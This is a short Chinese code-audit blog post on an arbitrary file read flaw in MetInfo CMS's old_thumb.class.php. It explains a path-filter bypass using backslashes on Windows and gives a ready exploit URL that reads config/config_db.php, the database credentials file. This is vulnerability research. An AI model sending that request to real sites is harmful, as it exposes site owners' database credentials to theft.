代码审计-MetInfo CMS任意文件读取漏洞
2024-09-01 11:55:19
0x01 代码分析
发现在app\system\include\module\old_thumb.class.php疑似有任意文件读取漏洞
public function doshow(){
global $_M; $dir = str_replace(array('../','./'), '', $_GET['dir']); if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
header("Content-type: image/jpeg");
ob_start();
readfile($dir);
ob_flush();
flush();
die;
}
页面建立old_thumb 类,并创建dbshow方法 2.程序首先过滤…/和./两个特殊字符,然后要求字符必须以http开头,并且不能检测到./字符,最后读取文件内容。 3.看似过滤非常完美,但是依然能够绕过,windows下可以使用…\绕过
0x02 漏洞利用
http://192.168.5.172/include/thumb.php?dir=http\..\..\config\config_db.php
最新文章
- WCF学习第二篇:WCF 配置架构。这有助于对wcf配置的理解和记忆
- Linux服务器配置之加载硬盘
- javascript获取对应页面的代码
- asp.net使用unescape读取js escape编码过的字符串
- Eclipse标准版安装J2EE插件
- Python内置函数(54)——callable
- 6. VIM 系列 - 全局搜索(ctrlsf.vim)
- 分析 js构造函数:对象方法 、类方法 、原型方法
- Java并发编程实战 之 对象的共享
- CSS --记录
- 好系统重装助手教你清理win7系统中DNS缓存
- html<;meta>;标签
- Spring生态研习【四】:Springboot+mybatis(探坑记)
- Mybatis中输入输出映射和动态Sql
- TZOJ:最大连续子序列
- Python3基础 list [] 创建整数列表
- 加快android studio 编译速度(已更新至Android Studio 3.3.1)
- std::u32string conversion to/from std::string and std::u16string
- 解决提交项目到GitHub,报错Please tell me who you are的问题
- 会话控制(session和cookie)、跨页面传值